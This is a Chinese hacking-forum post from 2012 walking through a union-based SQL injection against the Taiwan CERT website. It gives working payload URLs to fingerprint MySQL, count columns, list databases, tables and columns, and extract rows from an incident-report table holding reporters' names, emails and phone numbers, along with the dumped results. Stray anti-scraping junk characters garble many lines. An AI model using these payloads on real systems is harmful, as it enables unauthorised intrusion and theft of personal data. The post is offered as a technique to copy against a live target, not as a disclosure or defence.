找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1728|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询' @, l; p7 U) ~0 }0 Y# g
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解$ y2 d; v6 _, q- @
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
8 H+ w, C6 F- ]" M3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--5 e( ^! B3 H4 Z+ K/ S0 H3 w
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
1 o, a2 m. C3 o' B0 x, v4.判断有没有写权限
( w% r' c- b$ A3 ?6 bhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
0 w6 f" O% Q$ Q: b% u: h/ X没办法,手动猜表啦
. B+ [( X4 C2 v* _; X" S- j4 G/ y5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
. d5 ]) `+ ~. `' q4 [但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
5 ~) C/ [/ ?' d6 A- Ehttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
$ [; B0 D) k* O0 P* Z. d成功查出所有数据库,国外的黑客就是不一般。数据库如下:( ?" ^. |: p8 P3 g8 u
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb  u9 m9 b# E2 C  f
6.爆表,爆的是twcert库
$ ~/ i& |3 y. N( H  Rhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--( t2 D$ Y! k5 x, Y/ J- u
爆出如下表  ~9 l7 C4 l$ U
downloadfile,irsys,newsdata,secrpt,secrpt_big5
/ ]* u) {0 C) B( u) D6 v6 T7.爆列名,这次爆的是irsys表
3 q  Q7 M7 v* q9 J3 qhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--4 G/ A' P6 a# q9 ]8 `1 b' ]
爆出如下列
8 j3 b7 W/ L  h& s" D& {' Z1 l( Cir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
+ ^2 O; Y% E$ ?, J3 v- l- `, y0 [8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。3 ?$ \* G/ w1 g2 K4 @4 `7 w: Y
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--  l( X0 N3 u, [9 O; D4 _! [
返回是3,说明每个列里有3个地段
  m& `4 u1 i$ Y. Y! @9.爆字段内容
( c- m& v" P% f  ehttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
9 n' e2 |8 L3 O) c爆出name列的第一个字段的内容6 L# f$ r/ Q) I- p
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
' z' A3 ^" B+ I4 _& x7 k9 ~爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表